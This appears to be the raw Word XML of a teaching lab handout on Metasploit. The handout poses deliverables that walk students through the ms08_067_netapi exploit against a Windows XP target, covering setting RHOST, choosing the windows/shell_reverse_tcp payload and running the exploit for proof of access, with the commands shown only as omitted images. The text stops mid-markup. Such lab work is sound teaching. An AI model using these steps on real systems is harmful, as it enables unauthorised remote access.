    <w:p w14:paraId="2DD709EA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">Deliverable #1.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve">Run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>banner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> command and explain what it does.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA42D9A" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E762D63" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B7EA88" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #1.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> What will the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> command do? Give an example of using it searching for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>ms08-067</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AD4CC2" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6670C9" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #1.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> What will the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> command do? Get more information about </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>ms08-067</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5401C5B4" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630A7FCD" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D5CD84" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393A05F6" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02039360" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3977A8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB04132" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Part #2 – Exploiting a Windows XP Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC211DA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason behind using a Windows XP target is so we can easily be able to test and cover most of the features MSF has to provide. That does not mean it won’t work on new systems, but the idea here is to learn the basics and not get into other unknown trouble with newer systems. After scanning the network, we found a running Windows XP operating system. There is a vulnerability which can be exploited remotely </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ms08_067_netapi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, let’s try and check if this system we found is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2933A73F" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA3E791" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>First you need to load the module related to this exploit. This can be done using the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F76AAF" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="58C98966" wp14:editId="46A8E0DA">
            <wp:extent cx="6400800" cy="596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400800" cy="596900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C4A094" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="735121E8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:r>
        <w:t>As you can see now, the msf prompt has changed to reflect the selection made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8EC0D0" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B7B7B7"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="57C6DA05" wp14:editId="02A6CEF5">
            <wp:extent cx="4900262" cy="338804"/>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00262" cy="338804"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln w="12700">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187A509" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="6BD309F5" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">To check modules options, use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command as following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A31E4FB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B7B7B7"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B7B7B7"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="545E3803" wp14:editId="3D97AEF9">
            <wp:extent cx="6400800" cy="27559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400800" cy="2755900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A3718" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="79905940" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Please note that the IP Address you see in LHOST is the IP Address of the Kali Linux system. Yours might be different depending on what IP Address is your system configured with.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BCDBAB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="35440CDB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #2.1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> to configure the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>RHOST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to reflect your target, as seen in the figure below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAE1051" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B4B656" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534"/>
    <w:p w14:paraId="1DC3E2F3" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #2.2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do you need to configure other options? Run the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>show options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> command again.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE658B8" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65E67FE1" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4D073" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Metasploit provides a variety of payloads (Shellcode) to choose from. For this particular lab choose the single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>shell_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload. To set the proper payload, use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> command. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577DB354" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C557868" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #2.3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Show how to properly configure the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>PAYLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> option to use the “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>windows/shell_reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>“ payload with the exploit selected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F8EDEB" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00305534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CC3CCA" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>Deliverable #2.4:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:shd w:val="clear" w:color="auto" w:fill="B6D7A8"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to execute the exploit you just configured. Show proof of access to your victim’s system similar to the screenshot below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B450B38" w14:textId="77777777" w:rsidR="00305534" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:rPr>
